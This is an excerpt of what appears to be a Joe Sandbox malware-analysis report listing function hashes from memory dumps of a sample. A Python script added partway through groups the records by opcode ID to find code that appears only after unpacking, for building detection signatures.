• Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
• Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Similarity
• Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
• Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
• Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
• Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                    • Instruction ID: 352fb5028f2a558129d1bf0d30685e94e1c1bc7a4c914f97d63ce2c3003d360b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A3172322183048FC725CF248C806BBB316EF8B748F1C893EDA8583341D374C9018B62
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                    • Instruction ID: fdd1e800dfa4eb5b9066ef2130ba445994d89929f8c308095e7a0d58a1adf969
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2731C53CA18501DAEB65BB19CC40B367B67FBC6304F68962ED0C1936A8DB34AC61CB14
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                    • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                    • Instruction ID: 9a85a5abcd99f592c4564a956b476160b708ee9b0f22e2b227e8c0448cc8e0f4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36212721B086910BD758DE3DC8D223BFBD39BDB118B18C63FC4A28B6D5CA30D9068608
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                    • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                    • Instruction ID: 0b6b90f66fea6f4cd754c8f13be98c01af2b010cace34d3c23ed34297428df6a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F334614B019FD761CF28D880B27B7A3EBD6724F298668D5958B799DB30E842CB44
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                    • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                    • Instruction ID: 39b67cc6e5634f63fe0bf00e2897fb642465cb59fcd3b610fe5345e318ec2055
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF1101356443409BCB598F68D8D1ABFF3A1AF86305F88583EA1D2C7391C3B4C8018B56
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                    • Instruction ID: de908c3075da78d8ad81e5e3726d8c6e6d3a63167c1b396a5a7bcafa07da8bc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7118C79A587044FC318EFA8ECC023BB3A0EB96314F29853C85E607750D7708D108609
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                    • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                    • Instruction ID: d84d16a2701e700059073e02b8e3706f799b516fd3db308a49a4ecada3aeed0f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE0126747052805BF3584B28EC61B3FB353E7E2700F66913EE1819B2D1EEB08C418B06
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                    • Instruction ID: 8d58df49f5d26529fbe7367cd5e425c053bc4c46518050ed1f987ae9882f9d76
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911C63BA091D50EC7168D3C8400579BFE30A93535B29C3DEF4B49B2D2C6238D8A8760
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                    • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                    • Instruction ID: dc553325a8e6631a22f4eb1b47f9b9307813544eab282f02fb030ddad6cf930c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 180171F160030187EB22AE6585C1B77B6F96F82715F18452EDB0A57300DB76E815CEB5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                    • Instruction ID: 5e94d896eb3e17ad29e6d7673a861a027fb9c7f82995a6f2207671aa435dab1a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11E2367543404BD718CF68D8E06BFB3E19B86301F99543E9482C3390CBB8C9068B46
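The records above carry two fingerprints per function: an Opcode ID and an Instruction ID. Several Opcode IDs (44c97935…, 3e517b76…) appear both in the PE-backed dump at 00400000 and in the non-PE-backed region at 02490000, each time with a different Instruction ID, while others (babb52ce…, 08b43458…) occur only in the 02490000 region. The following script is an added example, not part of the Joe Sandbox report: it parses records in this listing's layout (copied verbatim from the listing, with the unused Snapshot/Fuzzy Hash fields omitted) and groups them by Opcode ID to show which functions are shared between dumps and which exist only in runtime-allocated memory. That Opcode ID is operand-independent while Instruction ID covers the full instruction bytes is an inference from the listing, not something the report documents.

```python
"""Group Joe Sandbox function records by Opcode ID across memory dumps.

Added example for this report; the record parser assumes the layout shown in
the listing ("Memory Dump Source" header, then "• Field: value" lines).
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Records copied from this report's disassembly listing (one function each).
REPORT_RECORDS = """\
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction ID: de908c3075da78d8ad81e5e3726d8c6e6d3a63167c1b396a5a7bcafa07da8bc7
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
• Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: 8d58df49f5d26529fbe7367cd5e425c053bc4c46518050ed1f987ae9882f9d76
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
• Instruction ID: dc553325a8e6631a22f4eb1b47f9b9307813544eab282f02fb030ddad6cf930c
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
• Instruction ID: 5e94d896eb3e17ad29e6d7673a861a027fb9c7f82995a6f2207671aa435dab1a
"""


@dataclass(frozen=True)
class FunctionRecord:
    source_file: str
    offset: int          # dump base address, parsed from "Offset: 02490000"
    based_on_pe: bool    # True when the dump is backed by a mapped PE image
    opcode_id: str       # assumed operand-independent (same across dumps here)
    instruction_id: str  # assumed to cover full instruction bytes (differs)


# "• Key: value" lines; lines without a colon (headers, "Similarity") are skipped.
FIELD_RE = re.compile(r"^\s*(?:•\s*)?(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def _build(fields):
    m = SOURCE_RE.match(fields.get("Source File", ""))
    if not m:
        raise ValueError("unrecognised Source File line: %r" % fields.get("Source File"))
    return FunctionRecord(
        source_file=m.group("file"),
        offset=int(m.group("off"), 16),
        based_on_pe=m.group("pe") == "true",
        opcode_id=fields["Opcode ID"],
        instruction_id=fields["Instruction ID"],
    )


def parse_records(text):
    """Split the listing at each "Memory Dump Source" header into records."""
    records, fields = [], {}
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            if fields:
                records.append(_build(fields))
            fields = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            fields[m.group("key")] = m.group("value").strip()
    if fields:
        records.append(_build(fields))
    return records


def shared_opcode_ids(records):
    """Opcode IDs seen in more than one dump, mapped to the dump offsets."""
    seen = defaultdict(set)
    for r in records:
        seen[r.opcode_id].add(r.offset)
    return {oid: offs for oid, offs in seen.items() if len(offs) > 1}


def unpacked_only(records):
    """Opcode IDs present only in dumps not backed by a PE image, i.e. code
    that was never part of the on-disk module and appeared in memory at runtime."""
    in_pe = {r.opcode_id for r in records if r.based_on_pe}
    return sorted({r.opcode_id for r in records if not r.based_on_pe} - in_pe)


if __name__ == "__main__":
    recs = parse_records(REPORT_RECORDS)
    for oid, offs in shared_opcode_ids(recs).items():
        print("shared", oid[:16], [hex(o) for o in sorted(offs)])
    for oid in unpacked_only(recs):
        print("runtime-only", oid[:16])
```

Shared IDs are the functions a disk-based detection would also see in the main image; the runtime-only set is where to look when building signatures for code that exists only after unpacking, since no static scan of the dropped file will ever contain those bytes.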
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                    • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                    • Instruction ID: d3f395a3666704a597fe5cd152006ad51eb89866d7b0aff70ef20e2f81c0ad7d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50112B7D6042005BD3509F29DD80E3BB7EAEBD6700F36D43EE68057251DB30C8529756
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                    • Instruction ID: 96776e6ca58e4aa10d5ba030708700e1f4611ba1bbc7aad69bbda72d62d4017c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11E7747407804FD7158F28CCD5E627B63AB86318719853EA8429BB92C66CAC05CB64
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                    • Instruction ID: 0e8f66d183fe9e14be1779e28ad330ba7fcea72684f28741df0ac43413b1dcca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5611A071608341ABD724DF29DDA077FBBE2EBC6254F15AE2CE59653791C630C841CB0A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
